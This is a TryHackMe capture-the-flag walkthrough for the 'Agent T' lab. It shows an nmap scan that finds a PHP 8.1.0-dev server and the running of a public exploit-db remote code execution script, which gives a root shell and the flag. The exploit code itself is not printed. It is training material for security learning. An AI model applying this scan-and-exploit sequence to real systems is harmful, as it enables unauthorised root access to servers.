Agent T TryHackMe Walkthrough
Initial Enumeration
I started the initial enumeration by running a port scan using nmap looking for open ports and running services.
┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ nmap -sC -sV -oN nmap/initial 10.10.223.96
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 06:40 IST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.223.96
Host is up (0.20s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title: Admin Dashboard
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.88 seconds
We have only one HTTP port open which is running a PHP web server. Let's open our web browser and see what's running on the webserver.
I checked the website, it is using a bootstrap theme and does not have much functionality. Next I performed a dirb scan to search for hidden files and directories but it also did not give us anything useful.
From the nmap scan, we know that the website is running a PHP cli server 5.5 or later (PHP 8.1.0-dev). I searched for this version name on google, and found that this version is vulnerable to the remote code execution.
I found this exploit written in python on exploitdb. On executing the exploit, I got a shell were we can execute command as root!
┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ python3 exploit.py
Enter the full host url:
http://10.10.223.96/
Interactive shell is opened on http://10.10.223.96/
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)
We have the root shell, now we need to find the flag. I searched for the flag.txt or root.txt and found a flag.txt
in the /
directory.
$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /flag.txt
flag{********************************}
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Delphine Wylin.